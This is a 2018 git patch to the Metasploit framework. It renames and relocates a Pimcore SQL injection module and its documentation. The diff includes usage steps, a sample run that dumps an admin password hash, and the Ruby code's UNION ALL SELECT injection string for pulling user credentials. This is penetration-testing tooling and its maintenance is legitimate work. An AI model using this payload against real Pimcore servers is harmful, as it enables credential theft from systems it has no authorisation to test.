From b6ca8cac7fd4bdfed6271acf368a010fe09b32b9 Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Wed, 19 Sep 2018 08:11:45 -0500 Subject: [PATCH] renamed/relocated files, changed uri --- .../pimcore_creds_sqli.md} | 10 +++++----- .../pimcore_creds_sqli.rb} | 4 +--- 2 files changed, 6 insertions(+), 8 deletions(-) rename documentation/modules/auxiliary/{sqli/oracle/pimcore_list_creds.md => gather/pimcore_creds_sqli.md} (83%) rename modules/auxiliary/{sqli/oracle/pimcore_list_creds.rb => gather/pimcore_creds_sqli.rb} (95%) diff --git a/documentation/modules/auxiliary/sqli/oracle/pimcore_list_creds.md b/documentation/modules/auxiliary/gather/pimcore_creds_sqli.md similarity index 83% rename from documentation/modules/auxiliary/sqli/oracle/pimcore_list_creds.md rename to documentation/modules/auxiliary/gather/pimcore_creds_sqli.md index 29d12eed08..79da45b815 100644 --- a/documentation/modules/auxiliary/sqli/oracle/pimcore_list_creds.md +++ b/documentation/modules/auxiliary/gather/pimcore_creds_sqli.md @@ -16,7 +16,7 @@ 1. Install the application 2. Start msfconsole - 3. Do: `use auxiliary/sqli/oracle/pimcore_list_creds` + 3. Do: `use auxiliary/gather/pimcore_creds_sqli` 4. Do: `set RHOSTS [IP]` 5. Do: `set TARGETURI [URI]` 6. Do: `set APIKEY [KEY]` @@ -34,12 +34,12 @@ ### Tested on Ubuntu 18.04.1 Running Pimcore v5.2.3 ``` - msf5 > use auxiliary/sqli/oracle/pimcore_list_creds - msf5 auxiliary(sqli/oracle/pimcore_list_creds) > set rhosts 192.168.37.246 + msf5 > use auxiliary/gather/pimcore_creds_sqli + msf5 auxiliary(gather/pimcore_creds_sqli) > set rhosts 192.168.37.246 rhosts => 192.168.37.246 - msf5 auxiliary(sqli/oracle/pimcore_list_creds) > set apikey 77369eee2b728e0efbb2c296549aea09b91d3751c26a3c27ce0b1dbb6bfaf11b + msf5 auxiliary(gather/pimcore_creds_sqli) > set apikey 77369eee2b728e0efbb2c296549aea09b91d3751c26a3c27ce0b1dbb6bfaf11b apikey => 77369eee2b728e0efbb2c296549aea09b91d3751c26a3c27ce0b1dbb6bfaf11b - msf5 auxiliary(sqli/oracle/pimcore_list_creds) > run + msf5 auxiliary(gather/pimcore_creds_sqli) > run [+] Credentials obtained: [+] admin : $2y$10$sBaD3EOAm/i1F3Mm/fwseeq3nyoacdlUt4NkVLZUgJ4FTReJSKIbe diff --git a/modules/auxiliary/sqli/oracle/pimcore_list_creds.rb b/modules/auxiliary/gather/pimcore_creds_sqli.rb similarity index 95% rename from modules/auxiliary/sqli/oracle/pimcore_list_creds.rb rename to modules/auxiliary/gather/pimcore_creds_sqli.rb index c10f5cc4c8..2333957a21 100644 --- a/modules/auxiliary/sqli/oracle/pimcore_list_creds.rb +++ b/modules/auxiliary/gather/pimcore_creds_sqli.rb @@ -5,7 +5,6 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, @@ -42,8 +41,7 @@ class MetasploitModule < Msf::Auxiliary end def get_creds - api_uri = "/webservice/rest/object-inquire" - api_uri = normalize_uri(target_uri.path, api_uri) + api_uri = normalize_uri(target_uri.path, "/webservice/rest/object-inquire") cmd = "#{rand(256)}) UNION ALL SELECT CONCAT(name,\" \",password) from users#" res = send_request_cgi(